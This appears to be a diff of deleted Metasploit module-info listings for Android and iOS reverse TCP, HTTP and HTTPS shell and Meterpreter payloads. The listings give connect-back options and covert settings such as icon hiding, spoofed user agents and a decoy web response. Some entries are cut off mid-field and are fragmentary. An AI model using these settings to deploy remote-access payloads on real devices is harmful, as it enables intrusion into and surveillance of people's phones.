OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,54 +0,0 @@
Name: Android Meterpreter Shell, Reverse TCP Inline
Module: payload/android/meterpreter_reverse_tcp
Platform: Android
Arch: dalvik
Needs Admin: No
Total size: 74177
Rank: Normal
Provided by:
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Connect back to the attacker and spawn a Meterpreter shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,63 +0,0 @@
Name: Command Shell, Android Reverse HTTP Stager
Module: payload/android/shell/reverse_http
Platform: Android
Arch: dalvik
Needs Admin: N
Evasion options for payload/android/shell/reverse_http:
=========================
asploit.com>
anwarelmakrahy
OJ Reeves
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
Description:
Spawn a piped command shell (sh).
Tunnel communication over HTTP
Name Current Setting Required Description
---- --------------- -------- -----------
AndroidHideAppIcon false no Hide the application icon automatically after launch
AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled
AndroidWakelock true no Acquire a wakelock before starting the payload
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EnableStageEncoding false no Encode the second stage payload
HttpCookie no An optional value to use for the Cookie HTTP header
HttpHostHeader no An optional value to use for the Host HTTP header
HttpReferer no An optional value to use for the Referer HTTP header
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,66 +0,0 @@
Name: Command Shell, Android Reverse HTTPS Stager
Module: payload/android/shell/reverse_https
Platform: Android
Arch: dalvik
Needs Admin: N
Evasion options for payload/android/shell/reverse_https:
=========================
sploit.com>
anwarelmakrahy
OJ Reeves
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
Description:
Spawn a piped command shell (sh).
Tunnel communication over HTTPS
Name Current Setting Required Description
---- --------------- -------- -----------
AndroidHideAppIcon false no Hide the application icon automatically after launch
AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled
AndroidWakelock true no Acquire a wakelock before starting the payload
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EnableStageEncoding false no Encode the second stage payload
HandlerSSLCert no Path to a SSL certificate in unified PEM format
HttpCookie no An optional value to use for the Cookie HTTP header
HttpHostHeader no An optional value to use for the Host HTTP header
HttpReferer no An optional value to use for the Referer HTTP header
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,54 +0,0 @@
Name: Command Shell, Android Reverse TCP Stager
Module: payload/android/shell/reverse_tcp
Platform: Android
Arch: dalvik
Needs Admin: No
Total size: 10209
Rank: Normal
Provided by:
mihi
egypt <egypt@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Spawn a piped command shell (sh).
Connect back stager
Name Current Setting Required Description
---- --------------- -------- -----------
AndroidHideAppIcon false no Hide the application icon automatically after launch
AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled
AndroidWakelock true no Acquire a wakelock before starting the payload
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EnableStageEncoding false no Encode the second stage payload
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,64 +0,0 @@
Name: Apple_iOS Meterpreter, Reverse HTTP Inline
Module: payload/apple_ios/aarch64/meterpreter_reverse_http
Platform: Apple_iOS
Arch: aarch64
Needs Admin: No
Total size: 796904
Rank: Normal
Provided by:
Adam Cammack <adam_cammack@rapid7.com>
Brent Cook <brent_cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
Description:
Run the Meterpreter / Mettle server payload (stageless)
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,65 +0,0 @@
Name: Apple_iOS Meterpreter, Reverse HTTPS Inline
Module: payload/apple_ios/aarch64/meterpreter_reverse_https
Platform: Apple_iOS
Arch: aarch64
Needs Admin: No
Total size
Evasion options for payload/apple_ios/aarch64/meterpreter_reverse_https:
=========================
<brent_cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
Description:
Run the Meterpreter / Mettle server payload (stageless)
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,58 +0,0 @@
Name: Apple_iOS Meterpreter, Reverse TCP Inline
Module: payload/apple_ios/aarch64/meterpreter_reverse_tcp
Platform: Apple_iOS
Arch: aarch64
Needs Admin: No
Total size: 796904
Rank: Normal
Provided by:
Adam Cammack <adam_cammack@rapid7.com>
Brent Cook <brent_cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Run the Meterpreter / Mettle server payload (stageless)
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,38 +0,0 @@
Name: Apple iOS aarch64 Command Shell, Reverse TCP Inline
Module: payload/apple_ios/aarch64/shell_reverse_tcp
Platform: Apple_iOS
Arch: aarch64
Needs Admin: No
Total size: 152
Rank: Normal
Provided by:
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SHELL /bin/sh yes The shell to execute.
Description:
Connect back to attacker and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,63 +0,0 @@
Name: Apple_iOS Meterpreter, Reverse HTTP Inline
Module: payload/apple_ios/armle/meterpreter_reverse_http
Platform: Apple_iOS
Arch: armle
Needs Admin: No
Total size
Evasion options for payload/apple_ios/armle/meterpreter_reverse_http:
=========================
ok <brent_cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
Description:
Run the Meterpreter / Mettle server payload (stageless)
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,65 +0,0 @@
Name: Apple_iOS Meterpreter, Reverse HTTPS Inline
Module: payload/apple_ios/armle/meterpreter_reverse_https
Platform: Apple_iOS
Arch: armle
Needs Admin: No
Total size
Evasion options for payload/apple_ios/armle/meterpreter_reverse_https:
=========================
k <brent_cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
Description:
Run the Meterpreter / Mettle server payload (stageless)
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,58 +0,0 @@
Name: Apple_iOS Meterpreter, Reverse TCP Inline
Module: payload/apple_ios/armle/meterpreter_reverse_tcp
Platform: Apple_iOS
Arch: armle
Needs Admin: No
Total size: 643824
Rank: Normal
Provided by:
Adam Cammack <adam_cammack@rapid7.com>
Brent Cook <brent_cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Run the Meterpreter / Mettle server payload (stageless)
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
